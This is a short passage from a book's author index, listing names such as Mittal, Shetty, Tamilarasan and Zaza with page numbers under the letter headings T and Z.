Mittal, Dhruv, 749 Shetty, Mangala, 675
Mittal, Namita, 581 Shetty, Spoorthi, 675
Mohanty, Maitri, 711 Shinde, Swati V., 157
Mohapatra, Ambarish G., 711 Shivani, 67
T
Tamilarasan, B., 329 Z
Taruna, 779 Zaza, Gianluca, 807